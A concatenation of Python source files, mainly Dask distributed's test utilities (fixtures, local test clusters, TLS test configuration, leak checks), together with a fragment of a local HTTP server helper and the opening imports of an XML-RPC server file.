def log_message(self, format, *args):
lgr.debug(format % args)
def simple_http_server(host="localhost", port=4001, path="."):
"""
From: https://stackoverflow.com/a/38943044
"""
server = HTTPServer((host, port), LoggingRequestHandler)
thread = threading.Thread(target=server.serve_forever)
thread.deamon = True
cwd = os.getcwd()
def start():
os.chdir(path)
thread.start()
lgr.debug("starting server on port {}".format(server.server_port))
def stop():
os.chdir(cwd)
server.shutdown()
server.socket.close()
lgr.debug("stopping server on port {}".format(server.server_port))
return start, stop, port
def start_server(port=8000, path=None, tmpdir=None):
if path is None:
path = os.getcwd()
requests_cache.install_cache(tmpdir or mkdtemp())
start, stop, port = simple_http_server(port=port, path=path)
start()
return stop, port
def stop_server(stop):
stop()
requests_cache.clear()
|
utils_test.py
|
from __future__ import print_function, division, absolute_import
import collections
from contextlib import contextmanager
import copy
from datetime import timedelta
import functools
import gc
from glob import glob
import itertools
import logging
import logging.config
import os
import re
import shutil
import signal
import socket
import subprocess
import sys
import tempfile
import textwrap
import threading
from time import sleep
import uuid
import warnings
import weakref
try:
import ssl
except ImportError:
ssl = None
import pytest
import six
import dask
from toolz import merge, memoize, assoc
from tornado import gen, queues
from tornado.gen import TimeoutError
from tornado.ioloop import IOLoop
from .client import default_client, _global_clients, Client
from .compatibility import PY3, Empty, WINDOWS
from .comm import Comm
from .comm.utils import offload
from .config import initialize_logging
from .core import connect, rpc, CommClosedError
from .deploy import SpecCluster
from .metrics import time
from .process import _cleanup_dangling
from .proctitle import enable_proctitle_on_children
from .security import Security
from .utils import (
ignoring,
log_errors,
mp_context,
get_ip,
get_ipv6,
DequeHandler,
reset_logger_locks,
sync,
iscoroutinefunction,
thread_state,
)
from .worker import Worker, TOTAL_MEMORY
from .nanny import Nanny
try:
import dask.array # register config
except ImportError:
pass
logger = logging.getLogger(__name__)
logging_levels = {
name: logger.level
for name, logger in logging.root.manager.loggerDict.items()
if isinstance(logger, logging.Logger)
}
offload(lambda: None).result() # create thread during import
@pytest.fixture(scope="session")
def valid_python_script(tmpdir_factory):
local_file = tmpdir_factory.mktemp("data").join("file.py")
local_file.write("print('hello world!')")
return local_file
@pytest.fixture(scope="session")
def client_contract_script(tmpdir_factory):
local_file = tmpdir_factory.mktemp("data").join("distributed_script.py")
lines = (
"from distributed import Client",
"e = Client('127.0.0.1:8989')",
"print(e)",
)
local_file.write("\n".join(lines))
return local_file
@pytest.fixture(scope="session")
def invalid_python_script(tmpdir_factory):
local_file = tmpdir_factory.mktemp("data").join("file.py")
local_file.write("a+1")
return local_file
@gen.coroutine
def cleanup_global_workers():
for worker in Worker._instances:
worker.close(report=False, executor_wait=False)
@pytest.fixture
def loop():
with check_instances():
with pristine_loop() as loop:
# Monkey-patch IOLoop.start to wait for loop stop
orig_start = loop.start
is_stopped = threading.Event()
is_stopped.set()
def start():
is_stopped.clear()
try:
orig_start()
finally:
is_stopped.set()
loop.start = start
yield loop
# Stop the loop in case it's still running
try:
sync(loop, cleanup_global_workers, callback_timeout=0.500)
loop.add_callback(loop.stop)
except RuntimeError as e:
if not re.match("IOLoop is clos(ed|ing)", str(e)):
raise
except gen.TimeoutError:
pass
else:
is_stopped.wait()
@pytest.fixture
def loop_in_thread():
with pristine_loop() as loop:
thread = threading.Thread(target=loop.start, name="test IOLoop")
thread.daemon = True
thread.start()
loop_started = threading.Event()
loop.add_callback(loop_started.set)
loop_started.wait()
yield loop
loop.add_callback(loop.stop)
thread.join(timeout=5)
@pytest.fixture
def zmq_ctx():
import zmq
ctx = zmq.Context.instance()
yield ctx
ctx.destroy(linger=0)
@contextmanager
def pristine_loop():
IOLoop.clear_instance()
IOLoop.clear_current()
loop = IOLoop()
loop.make_current()
assert IOLoop.current() is loop
try:
yield loop
finally:
try:
loop.close(all_fds=True)
except (KeyError, ValueError):
pass
IOLoop.clear_instance()
IOLoop.clear_current()
@contextmanager
def mock_ipython():
import mock
from distributed._ipython_utils import remote_magic
ip = mock.Mock()
ip.user_ns = {}
ip.kernel = None
def get_ip():
return ip
with mock.patch("IPython.get_ipython", get_ip), mock.patch(
"distributed._ipython_utils.get_ipython", get_ip
):
yield ip
# cleanup remote_magic client cache
for kc in remote_magic._clients.values():
kc.stop_channels()
remote_magic._clients.clear()
original_config = copy.deepcopy(dask.config.config)
def reset_config():
dask.config.config.clear()
dask.config.config.update(copy.deepcopy(original_config))
def nodebug(func):
"""
A decorator to disable debug facilities during timing-sensitive tests.
Warning: this doesn't affect already created IOLoops.
"""
if not PY3:
# py.test's runner magic breaks horridly on Python 2
# when a test function is wrapped, so avoid it
# (incidently, asyncio is irrelevant anyway)
return func
@functools.wraps(func)
def wrapped(*args, **kwargs):
old_asyncio_debug = os.environ.get("PYTHONASYNCIODEBUG")
if old_asyncio_debug is not None:
del os.environ["PYTHONASYNCIODEBUG"]
try:
return func(*args, **kwargs)
finally:
if old_asyncio_debug is not None:
os.environ["PYTHONASYNCIODEBUG"] = old_asyncio_debug
return wrapped
def nodebug_setup_module(module):
"""
A setup_module() that you can install in a test module to disable
debug facilities.
"""
module._old_asyncio_debug = os.environ.get("PYTHONASYNCIODEBUG")
if module._old_asyncio_debug is not None:
del os.environ["PYTHONASYNCIODEBUG"]
def nodebug_teardown_module(module):
"""
A teardown_module() that you can install in a test module to reenable
debug facilities.
"""
if module._old_asyncio_debug is not None:
os.environ["PYTHONASYNCIODEBUG"] = module._old_asyncio_debug
def inc(x):
return x + 1
def dec(x):
return x - 1
def mul(x, y):
return x * y
def div(x, y):
return x / y
def deep(n):
if n > 0:
return deep(n - 1)
else:
return True
def throws(x):
raise RuntimeError("hello!")
def double(x):
return x * 2
def slowinc(x, delay=0.02):
sleep(delay)
return x + 1
def slowdec(x, delay=0.02):
sleep(delay)
return x - 1
def slowdouble(x, delay=0.02):
sleep(delay)
return 2 * x
def randominc(x, scale=1):
from random import random
sleep(random() * scale)
return x + 1
def slowadd(x, y, delay=0.02):
sleep(delay)
return x + y
def slowsum(seq, delay=0.02):
sleep(delay)
return sum(seq)
def slowidentity(*args, **kwargs):
delay = kwargs.get("delay", 0.02)
sleep(delay)
if len(args) == 1:
return args[0]
else:
return args
def run_for(duration, timer=time):
"""
Burn CPU for *duration* seconds.
"""
deadline = timer() + duration
while timer() <= deadline:
pass
# This dict grows at every varying() invocation
_varying_dict = collections.defaultdict(int)
_varying_key_gen = itertools.count()
class _ModuleSlot(object):
def __init__(self, modname, slotname):
self.modname = modname
self.slotname = slotname
def get(self):
return getattr(sys.modules[self.modname], self.slotname)
def varying(items):
"""
Return a function that returns a result (or raises an exception)
from *items* at each call.
"""
# cloudpickle would serialize the *values* of all globals
# used by *func* below, so we can't use `global <something>`.
# Instead look up the module by name to get the original namespace
# and not a copy.
slot = _ModuleSlot(__name__, "_varying_dict")
key = next(_varying_key_gen)
def func():
dct = slot.get()
i = dct[key]
if i == len(items):
raise IndexError
else:
x = items[i]
dct[key] = i + 1
if isinstance(x, Exception):
raise x
else:
return x
return func
def map_varying(itemslists):
"""
Like *varying*, but return the full specification for a map() call
on multiple items lists.
"""
def apply(func, *args, **kwargs):
return func(*args, **kwargs)
return apply, list(map(varying, itemslists))
@gen.coroutine
def geninc(x, delay=0.02):
yield gen.sleep(delay)
raise gen.Return(x + 1)
def compile_snippet(code, dedent=True):
if dedent:
code = textwrap.dedent(code)
code = compile(code, "<dynamic>", "exec")
ns = globals()
exec(code, ns, ns)
if sys.version_info >= (3, 5):
compile_snippet(
"""
async def asyncinc(x, delay=0.02):
await gen.sleep(delay)
return x + 1
"""
)
assert asyncinc # noqa: F821
else:
asyncinc = None
_readone_queues = {}
@gen.coroutine
def readone(comm):
"""
Read one message at a time from a comm that reads lists of
messages.
"""
try:
q = _readone_queues[comm]
except KeyError:
q = _readone_queues[comm] = queues.Queue()
@gen.coroutine
def background_read():
while True:
try:
messages = yield comm.read()
except CommClosedError:
break
for msg in messages:
q.put_nowait(msg)
q.put_nowait(None)
del _readone_queues[comm]
background_read()
msg = yield q.get()
if msg is None:
raise CommClosedError
else:
raise gen.Return(msg)
def run_scheduler(q, nputs, port=0, **kwargs):
from distributed import Scheduler
# On Python 2.7 and Unix, fork() is used to spawn child processes,
# so avoid inheriting the parent's IO loop.
with pristine_loop() as loop:
scheduler = Scheduler(validate=True, host="127.0.0.1", port=port, **kwargs)
done = scheduler.start()
for i in range(nputs):
q.put(scheduler.address)
try:
loop.start()
finally:
loop.close(all_fds=True)
def run_worker(q, scheduler_q, **kwargs):
from distributed import Worker
reset_logger_locks()
with log_errors():
with pristine_loop() as loop:
scheduler_addr = scheduler_q.get()
worker = Worker(scheduler_addr, validate=True, **kwargs)
loop.run_sync(lambda: worker._start())
q.put(worker.address)
try:
@gen.coroutine
def wait_until_closed():
yield worker._closed.wait()
loop.run_sync(wait_until_closed)
finally:
loop.close(all_fds=True)
def run_nanny(q, scheduler_q, **kwargs):
with log_errors():
with pristine_loop() as loop:
scheduler_addr = scheduler_q.get()
worker = Nanny(scheduler_addr, validate=True, **kwargs)
loop.run_sync(lambda: worker._start())
q.put(worker.address)
try:
loop.start()
finally:
loop.run_sync(worker.close)
loop.close(all_fds=True)
@contextmanager
def check_active_rpc(loop, active_rpc_timeout=1):
active_before = set(rpc.active)
if active_before and not PY3:
# On Python 2, try to avoid dangling comms before forking workers
gc.collect()
active_before = set(rpc.active)
yield
# Some streams can take a bit of time to notice their peer
# has closed, and keep a coroutine (*) waiting for a CommClosedError
# before calling close_rpc() after a CommClosedError.
# This would happen especially if a non-localhost address is used,
# as Nanny does.
# (*) (example: gather_from_workers())
def fail():
pytest.fail(
"some RPCs left active by test: %s" % (set(rpc.active) - active_before)
)
@gen.coroutine
def wait():
yield async_wait_for(
lambda: len(set(rpc.active) - active_before) == 0,
timeout=active_rpc_timeout,
fail_func=fail,
)
loop.run_sync(wait)
@pytest.fixture
def cluster_fixture(loop):
with cluster() as (scheduler, workers):
yield (scheduler, workers)
@pytest.fixture
def s(cluster_fixture):
scheduler, workers = cluster_fixture
return scheduler
@pytest.fixture
def a(cluster_fixture):
scheduler, workers = cluster_fixture
return workers[0]
@pytest.fixture
def b(cluster_fixture):
scheduler, workers = cluster_fixture
return workers[1]
@pytest.fixture
def client(loop, cluster_fixture):
scheduler, workers = cluster_fixture
with Client(scheduler["address"], loop=loop) as client:
yield client
@pytest.fixture
def client_secondary(loop, cluster_fixture):
scheduler, workers = cluster_fixture
with Client(scheduler["address"], loop=loop) as client:
yield client
@contextmanager
def tls_cluster_context(
worker_kwargs=None, scheduler_kwargs=None, security=None, **kwargs
):
security = security or tls_only_security()
worker_kwargs = assoc(worker_kwargs or {}, "security", security)
scheduler_kwargs = assoc(scheduler_kwargs or {}, "security", security)
with cluster(
worker_kwargs=worker_kwargs, scheduler_kwargs=scheduler_kwargs, **kwargs
) as (s, workers):
yield s, workers
@pytest.fixture
def tls_cluster(loop, security):
with tls_cluster_context(security=security) as (scheduler, workers):
yield (scheduler, workers)
@pytest.fixture
def tls_client(tls_cluster, loop, security):
s, workers = tls_cluster
with Client(s["address"], security=security, loop=loop) as client:
yield client
@pytest.fixture
def security():
return tls_only_security()
@contextmanager
def cluster(
nworkers=2, nanny=False, worker_kwargs={}, active_rpc_timeout=1, scheduler_kwargs={}
):
ws = weakref.WeakSet()
enable_proctitle_on_children()
with clean(timeout=active_rpc_timeout, threads=False) as loop:
if nanny:
_run_worker = run_nanny
else:
_run_worker = run_worker
# The scheduler queue will receive the scheduler's address
scheduler_q = mp_context.Queue()
# Launch scheduler
scheduler = mp_context.Process(
name="Dask cluster test: Scheduler",
target=run_scheduler,
args=(scheduler_q, nworkers + 1),
kwargs=scheduler_kwargs,
)
ws.add(scheduler)
scheduler.daemon = True
scheduler.start()
# Launch workers
workers = []
for i in range(nworkers):
q = mp_context.Queue()
fn = "_test_worker-%s" % uuid.uuid4()
kwargs = merge(
{"nthreads": 1, "local_dir": fn, "memory_limit": TOTAL_MEMORY},
worker_kwargs,
)
proc = mp_context.Process(
name="Dask cluster test: Worker",
target=_run_worker,
args=(q, scheduler_q),
kwargs=kwargs,
)
ws.add(proc)
workers.append({"proc": proc, "queue": q, "dir": fn})
for worker in workers:
worker["proc"].start()
try:
for worker in workers:
worker["address"] = worker["queue"].get(timeout=5)
except Empty:
raise pytest.xfail.Exception("Worker failed to start in test")
saddr = scheduler_q.get()
start = time()
try:
try:
security = scheduler_kwargs["security"]
rpc_kwargs = {"connection_args": security.get_connection_args("client")}
except KeyError:
rpc_kwargs = {}
with rpc(saddr, **rpc_kwargs) as s:
while True:
nthreads = loop.run_sync(s.ncores)
if len(nthreads) == nworkers:
break
if time() - start > 5:
raise Exception("Timeout on cluster creation")
# avoid sending processes down to function
yield {"address": saddr}, [
{"address": w["address"], "proc": weakref.ref(w["proc"])}
for w in workers
]
finally:
logger.debug("Closing out test cluster")
loop.run_sync(
lambda: disconnect_all(
[w["address"] for w in workers], timeout=0.5, rpc_kwargs=rpc_kwargs
)
)
loop.run_sync(lambda: disconnect(saddr, timeout=0.5, rpc_kwargs=rpc_kwargs))
scheduler.terminate()
scheduler_q.close()
scheduler_q._reader.close()
scheduler_q._writer.close()
for w in workers:
w["proc"].terminate()
w["queue"].close()
w["queue"]._reader.close()
w["queue"]._writer.close()
scheduler.join(2)
del scheduler
for proc in [w["proc"] for w in workers]:
proc.join(timeout=2)
with ignoring(UnboundLocalError):
del worker, w, proc
del workers[:]
for fn in glob("_test_worker-*"):
with ignoring(OSError):
shutil.rmtree(fn)
try:
client = default_client()
except ValueError:
pass
else:
client.close()
start = time()
while any(proc.is_alive() for proc in ws):
text = str(list(ws))
sleep(0.2)
assert time() < start + 5, ("Workers still around after five seconds", text)
@gen.coroutine
def disconnect(addr, timeout=3, rpc_kwargs=None):
rpc_kwargs = rpc_kwargs or {}
@gen.coroutine
def do_disconnect():
with ignoring(EnvironmentError, CommClosedError):
with rpc(addr, **rpc_kwargs) as w:
yield w.terminate(close=True)
with ignoring(TimeoutError):
yield gen.with_timeout(timedelta(seconds=timeout), do_disconnect())
@gen.coroutine
def disconnect_all(addresses, timeout=3, rpc_kwargs=None):
yield [disconnect(addr, timeout, rpc_kwargs) for addr in addresses]
def gen_test(timeout=10):
""" Coroutine test
@gen_test(timeout=5)
def test_foo():
yield ... # use tornado coroutines
"""
def _(func):
def test_func():
with clean() as loop:
if iscoroutinefunction(func):
cor = func
else:
cor = gen.coroutine(func)
loop.run_sync(cor, timeout=timeout)
return test_func
return _
from .scheduler import Scheduler
from .worker import Worker
@gen.coroutine
def start_cluster(
nthreads,
scheduler_addr,
loop,
security=None,
Worker=Worker,
scheduler_kwargs={},
worker_kwargs={},
):
s = Scheduler(
loop=loop, validate=True, security=security, port=0, **scheduler_kwargs
)
done = s.start(scheduler_addr)
workers = [
Worker(
s.address,
nthreads=ncore[1],
name=i,
security=security,
loop=loop,
validate=True,
host=ncore[0],
**(merge(worker_kwargs, ncore[2]) if len(ncore) > 2 else worker_kwargs)
)
for i, ncore in enumerate(nthreads)
]
# for w in workers:
# w.rpc = workers[0].rpc
yield workers
start = time()
while len(s.workers) < len(nthreads) or any(
comm.comm is None for comm in s.stream_comms.values()
):
yield gen.sleep(0.01)
if time() - start > 5:
yield [w.close(timeout=1) for w in workers]
yield s.close(fast=True)
raise Exception("Cluster creation timeout")
raise gen.Return((s, workers))
@gen.coroutine
def end_cluster(s, workers):
logger.debug("Closing out test cluster")
@gen.coroutine
def end_worker(w):
with ignoring(TimeoutError, CommClosedError, EnvironmentError):
yield w.close(report=False)
yield [end_worker(w) for w in workers]
yield s.close() # wait until scheduler stops completely
s.stop()
def gen_cluster(
nthreads=[("127.0.0.1", 1), ("127.0.0.1", 2)],
ncores=None,
scheduler="127.0.0.1",
timeout=10,
security=None,
Worker=Worker,
client=False,
scheduler_kwargs={},
worker_kwargs={},
client_kwargs={},
active_rpc_timeout=1,
config={},
check_new_threads=True,
):
from distributed import Client
""" Coroutine test with small cluster
@gen_cluster()
def test_foo(scheduler, worker1, worker2):
yield ... # use tornado coroutines
See also:
start
end
"""
if ncores is not None:
warnings.warn("ncores= has moved to nthreads=")
nthreads = ncores
worker_kwargs = merge(
{"memory_limit": TOTAL_MEMORY, "death_timeout": 5}, worker_kwargs
)
def _(func):
if not iscoroutinefunction(func):
func = gen.coroutine(func)
def test_func():
result = None
workers = []
with clean(threads=check_new_threads, timeout=active_rpc_timeout) as loop:
@gen.coroutine
def coro():
with dask.config.set(config):
s = False
for i in range(5):
try:
s, ws = yield start_cluster(
nthreads,
scheduler,
loop,
security=security,
Worker=Worker,
scheduler_kwargs=scheduler_kwargs,
worker_kwargs=worker_kwargs,
)
except Exception as e:
logger.error(
"Failed to start gen_cluster, retrying",
exc_info=True,
)
else:
workers[:] = ws
args = [s] + workers
break
if s is False:
raise Exception("Could not start cluster")
if client:
c = yield Client(
s.address,
loop=loop,
security=security,
asynchronous=True,
**client_kwargs
)
args = [c] + args
try:
future = func(*args)
if timeout:
future = gen.with_timeout(
timedelta(seconds=timeout), future
)
result = yield future
if s.validate:
s.validate_state()
finally:
if client and c.status not in ("closing", "closed"):
yield c._close(fast=s.status == "closed")
yield end_cluster(s, workers)
yield gen.with_timeout(
timedelta(seconds=1), cleanup_global_workers()
)
try:
c = yield default_client()
except ValueError:
pass
else:
yield c._close(fast=True)
for i in range(5):
if all(c.closed() for c in Comm._instances):
break
else:
yield gen.sleep(0.05)
else:
L = [c for c in Comm._instances if not c.closed()]
Comm._instances.clear()
# raise ValueError("Unclosed Comms", L)
print("Unclosed Comms", L)
raise gen.Return(result)
result = loop.run_sync(
coro, timeout=timeout * 2 if timeout else timeout
)
for w in workers:
if getattr(w, "data", None):
try:
w.data.clear()
except EnvironmentError:
# zict backends can fail if their storage directory
# was already removed
pass
del w.data
return result
return test_func
return _
def raises(func, exc=Exception):
try:
func()
return False
except exc:
return True
def terminate_process(proc):
if proc.poll() is None:
if sys.platform.startswith("win"):
proc.send_signal(signal.CTRL_BREAK_EVENT)
else:
proc.send_signal(signal.SIGINT)
try:
if sys.version_info[0] == 3:
proc.wait(10)
else:
start = time()
while proc.poll() is None and time() < start + 10:
sleep(0.02)
finally:
# Make sure we don't leave the process lingering around
with ignoring(OSError):
proc.kill()
@contextmanager
def popen(args, **kwargs):
kwargs["stdout"] = subprocess.PIPE
kwargs["stderr"] = subprocess.PIPE
if sys.platform.startswith("win"):
# Allow using CTRL_C_EVENT / CTRL_BREAK_EVENT
kwargs["creationflags"] = subprocess.CREATE_NEW_PROCESS_GROUP
dump_stdout = False
args = list(args)
if sys.platform.startswith("win"):
args[0] = os.path.join(sys.prefix, "Scripts", args[0])
else:
args[0] = os.path.join(
os.environ.get("DESTDIR", "") + sys.prefix, "bin", args[0]
)
proc = subprocess.Popen(args, **kwargs)
try:
yield proc
except Exception:
dump_stdout = True
raise
finally:
try:
terminate_process(proc)
finally:
# XXX Also dump stdout if return code != 0 ?
out, err = proc.communicate()
if dump_stdout:
print("\n\nPrint from stderr\n %s\n=================\n" % args[0][0])
print(err.decode())
print("\n\nPrint from stdout\n=================\n")
print(out.decode())
def wait_for_port(address, timeout=5):
assert isinstance(address, tuple)
deadline = time() + timeout
while True:
timeout = deadline - time()
if timeout < 0:
raise RuntimeError("Failed to connect to %s" % (address,))
try:
sock = socket.create_connection(address, timeout=timeout)
except EnvironmentError:
pass
else:
sock.close()
break
def wait_for(predicate, timeout, fail_func=None, period=0.001):
deadline = time() + timeout
while not predicate():
sleep(period)
if time() > deadline:
if fail_func is not None:
fail_func()
pytest.fail("condition not reached until %s seconds" % (timeout,))
@gen.coroutine
def async_wait_for(predicate, timeout, fail_func=None, period=0.001):
deadline = time() + timeout
while not predicate():
yield gen.sleep(period)
if time() > deadline:
if fail_func is not None:
fail_func()
pytest.fail("condition not reached until %s seconds" % (timeout,))
@memoize
def has_ipv6():
"""
Return whether IPv6 is locally functional. This doesn't guarantee IPv6
is properly configured outside of localhost.
"""
serv = cli = None
try:
serv = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
serv.bind(("::", 0))
serv.listen(5)
cli = socket.create_connection(serv.getsockname()[:2])
except EnvironmentError:
return False
else:
return True
finally:
if cli is not None:
cli.close()
if serv is not None:
serv.close()
if has_ipv6():
def requires_ipv6(test_func):
return test_func
else:
requires_ipv6 = pytest.mark.skip("ipv6 required")
@gen.coroutine
def assert_can_connect(addr, timeout=None, connection_args=None):
"""
Check that it is possible to connect to the distributed *addr*
within the given *timeout*.
"""
if timeout is None:
timeout = 0.5
comm = yield connect(addr, timeout=timeout, connection_args=connection_args)
comm.abort()
@gen.coroutine
def assert_cannot_connect(
addr, timeout=None, connection_args=None, exception_class=EnvironmentError
):
"""
Check that it is impossible to connect to the distributed *addr*
within the given *timeout*.
"""
if timeout is None:
timeout = 0.5
with pytest.raises(exception_class):
comm = yield connect(addr, timeout=timeout, connection_args=connection_args)
comm.abort()
@gen.coroutine
def assert_can_connect_from_everywhere_4_6(
port, timeout=None, connection_args=None, protocol="tcp"
):
"""
Check that the local *port* is reachable from all IPv4 and IPv6 addresses.
"""
args = (timeout, connection_args)
futures = [
assert_can_connect("%s://127.0.0.1:%d" % (protocol, port), *args),
assert_can_connect("%s://%s:%d" % (protocol, get_ip(), port), *args),
]
if has_ipv6():
futures += [
assert_can_connect("%s://[::1]:%d" % (protocol, port), *args),
assert_can_connect("%s://[%s]:%d" % (protocol, get_ipv6(), port), *args),
]
yield futures
@gen.coroutine
def assert_can_connect_from_everywhere_4(
port, timeout=None, connection_args=None, protocol="tcp"
):
"""
Check that the local *port* is reachable from all IPv4 addresses.
"""
args = (timeout, connection_args)
futures = [
assert_can_connect("%s://127.0.0.1:%d" % (protocol, port), *args),
assert_can_connect("%s://%s:%d" % (protocol, get_ip(), port), *args),
]
if has_ipv6():
futures += [
assert_cannot_connect("%s://[::1]:%d" % (protocol, port), *args),
assert_cannot_connect("%s://[%s]:%d" % (protocol, get_ipv6(), port), *args),
]
yield futures
@gen.coroutine
def assert_can_connect_locally_4(port, timeout=None, connection_args=None):
"""
Check that the local *port* is only reachable from local IPv4 addresses.
"""
args = (timeout, connection_args)
futures = [assert_can_connect("tcp://127.0.0.1:%d" % port, *args)]
if get_ip() != "127.0.0.1": # No outside IPv4 connectivity?
futures += [assert_cannot_connect("tcp://%s:%d" % (get_ip(), port), *args)]
if has_ipv6():
futures += [
assert_cannot_connect("tcp://[::1]:%d" % port, *args),
assert_cannot_connect("tcp://[%s]:%d" % (get_ipv6(), port), *args),
]
yield futures
@gen.coroutine
def assert_can_connect_from_everywhere_6(port, timeout=None, connection_args=None):
"""
Check that the local *port* is reachable from all IPv6 addresses.
"""
assert has_ipv6()
args = (timeout, connection_args)
futures = [
assert_cannot_connect("tcp://127.0.0.1:%d" % port, *args),
assert_cannot_connect("tcp://%s:%d" % (get_ip(), port), *args),
assert_can_connect("tcp://[::1]:%d" % port, *args),
assert_can_connect("tcp://[%s]:%d" % (get_ipv6(), port), *args),
]
yield futures
@gen.coroutine
def assert_can_connect_locally_6(port, timeout=None, connection_args=None):
"""
Check that the local *port* is only reachable from local IPv6 addresses.
"""
assert has_ipv6()
args = (timeout, connection_args)
futures = [
assert_cannot_connect("tcp://127.0.0.1:%d" % port, *args),
assert_cannot_connect("tcp://%s:%d" % (get_ip(), port), *args),
assert_can_connect("tcp://[::1]:%d" % port, *args),
]
if get_ipv6() != "::1": # No outside IPv6 connectivity?
futures += [assert_cannot_connect("tcp://[%s]:%d" % (get_ipv6(), port), *args)]
yield futures
@contextmanager
def captured_logger(logger, level=logging.INFO, propagate=None):
"""Capture output from the given Logger.
"""
if isinstance(logger, str):
logger = logging.getLogger(logger)
orig_level = logger.level
orig_handlers = logger.handlers[:]
if propagate is not None:
orig_propagate = logger.propagate
logger.propagate = propagate
sio = six.StringIO()
logger.handlers[:] = [logging.StreamHandler(sio)]
logger.setLevel(level)
try:
yield sio
finally:
logger.handlers[:] = orig_handlers
logger.setLevel(orig_level)
if propagate is not None:
logger.propagate = orig_propagate
@contextmanager
def captured_handler(handler):
"""Capture output from the given logging.StreamHandler.
"""
assert isinstance(handler, logging.StreamHandler)
orig_stream = handler.stream
handler.stream = six.StringIO()
try:
yield handler.stream
finally:
handler.stream = orig_stream
@contextmanager
def new_config(new_config):
"""
Temporarily change configuration dictionary.
"""
from .config import defaults
config = dask.config.config
orig_config = config.copy()
try:
config.clear()
config.update(defaults.copy())
dask.config.update(config, new_config)
initialize_logging(config)
yield
finally:
config.clear()
config.update(orig_config)
initialize_logging(config)
@contextmanager
def new_environment(changes):
saved_environ = os.environ.copy()
os.environ.update(changes)
try:
yield
finally:
os.environ.clear()
os.environ.update(saved_environ)
@contextmanager
def new_config_file(c):
"""
Temporarily change configuration file to match dictionary *c*.
"""
import yaml
old_file = os.environ.get("DASK_CONFIG")
fd, path = tempfile.mkstemp(prefix="dask-config")
try:
with os.fdopen(fd, "w") as f:
f.write(yaml.dump(c))
os.environ["DASK_CONFIG"] = path
try:
yield
finally:
if old_file:
os.environ["DASK_CONFIG"] = old_file
else:
del os.environ["DASK_CONFIG"]
finally:
os.remove(path)
certs_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), "tests"))
def get_cert(filename):
"""
Get the path to one of the test TLS certificates.
"""
path = os.path.join(certs_dir, filename)
assert os.path.exists(path), path
return path
def tls_config():
"""
A functional TLS configuration with our test certs.
"""
ca_file = get_cert("tls-ca-cert.pem")
keycert = get_cert("tls-key-cert.pem")
c = {
"tls": {
"ca-file": ca_file,
"client": {"cert": keycert},
"scheduler": {"cert": keycert},
"worker": {"cert": keycert},
}
}
return c
def tls_only_config():
"""
A functional TLS configuration with our test certs, disallowing
plain TCP communications.
"""
c = tls_config()
c["require-encryption"] = True
return c
def tls_security():
"""
A Security object with proper TLS configuration.
"""
with new_config(tls_config()):
sec = Security()
return sec
def tls_only_security():
"""
A Security object with proper TLS configuration and disallowing plain
TCP communications.
"""
with new_config(tls_only_config()):
sec = Security()
assert sec.require_encryption
return sec
def get_server_ssl_context(
certfile="tls-cert.pem", keyfile="tls-key.pem", ca_file="tls-ca-cert.pem"
):
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH, cafile=get_cert(ca_file))
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_cert_chain(get_cert(certfile), get_cert(keyfile))
return ctx
def get_client_ssl_context(
certfile="tls-cert.pem", keyfile="tls-key.pem", ca_file="tls-ca-cert.pem"
):
ctx = ssl.create_default_context(ssl.Purpose.SERVER_AUTH, cafile=get_cert(ca_file))
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
ctx.load_cert_chain(get_cert(certfile), get_cert(keyfile))
return ctx
def bump_rlimit(limit, desired):
resource = pytest.importorskip("resource")
try:
soft, hard = resource.getrlimit(limit)
if soft < desired:
resource.setrlimit(limit, (desired, max(hard, desired)))
except Exception as e:
pytest.skip("rlimit too low (%s) and can't be increased: %s" % (soft, e))
def gen_tls_cluster(**kwargs):
kwargs.setdefault("nthreads", [("tls://127.0.0.1", 1), ("tls://127.0.0.1", 2)])
return gen_cluster(
scheduler="tls://127.0.0.1", security=tls_only_security(), **kwargs
)
@contextmanager
def save_sys_modules():
old_modules = sys.modules
old_path = sys.path
try:
yield
finally:
for i, elem in enumerate(sys.path):
if elem not in old_path:
del sys.path[i]
for elem in sys.modules.keys():
if elem not in old_modules:
del sys.modules[elem]
@contextmanager
def check_thread_leak():
active_threads_start = set(threading._active)
yield
start = time()
while True:
bad = [
t
for t, v in threading._active.items()
if t not in active_threads_start
and "Threaded" not in v.name
and "watch message" not in v.name
and "TCP-Executor" not in v.name
]
if not bad:
break
else:
sleep(0.01)
if time() > start + 5:
from distributed import profile
tid = bad[0]
thread = threading._active[tid]
call_stacks = profile.call_stack(sys._current_frames()[tid])
assert False, (thread, call_stacks)
@contextmanager
def check_process_leak():
start_children = set(mp_context.active_children())
yield
for i in range(50):
if not set(mp_context.active_children()) - start_children:
break
else:
sleep(0.2)
else:
assert not mp_context.active_children()
_cleanup_dangling()
@contextmanager
def check_instances():
Client._instances.clear()
Worker._instances.clear()
Scheduler._instances.clear()
SpecCluster._instances.clear()
# assert all(n.status == "closed" for n in Nanny._instances), {
# n: n.status for n in Nanny._instances
# }
Nanny._instances.clear()
_global_clients.clear()
Comm._instances.clear()
yield
start = time()
while set(_global_clients):
sleep(0.1)
assert time() < start + 10
_global_clients.clear()
for w in Worker._instances:
w.close(report=False, executor_wait=False)
if w.status == "running":
w.close()
Worker._instances.clear()
for i in range(5):
if all(c.closed() for c in Comm._instances):
break
else:
sleep(0.1)
else:
L = [c for c in Comm._instances if not c.closed()]
Comm._instances.clear()
print("Unclosed Comms", L)
# raise ValueError("Unclosed Comms", L)
assert all(n.status == "closed" or n.status == "init" for n in Nanny._instances), {
n: n.status for n in Nanny._instances
}
# assert not list(SpecCluster._instances) # TODO
assert all(c.status == "closed" for c in SpecCluster._instances)
SpecCluster._instances.clear()
Nanny._instances.clear()
DequeHandler.clear_all_instances()
@contextmanager
def clean(threads=not WINDOWS, processes=True, instances=True, timeout=1):
@contextmanager
def null():
yield
with check_thread_leak() if threads else null():
with pristine_loop() as loop:
with check_process_leak() if processes else null():
with check_instances() if instances else null():
with check_active_rpc(loop, timeout):
reset_config()
dask.config.set({"distributed.comm.timeouts.connect": "5s"})
# Restore default logging levels
# XXX use pytest hooks/fixtures instead?
for name, level in logging_levels.items():
logging.getLogger(name).setLevel(level)
yield loop
with ignoring(AttributeError):
del thread_state.on_event_loop_thread
|
serv.py
|
import os,sys,logging
import signal, time, atexit, threading
from SimpleXMLRPCServer import SimpleXMLRPCServer, SimpleXMLRPCRequestHandler
import xmlrpclib
import threading
import Queue
try:
import sqlite3
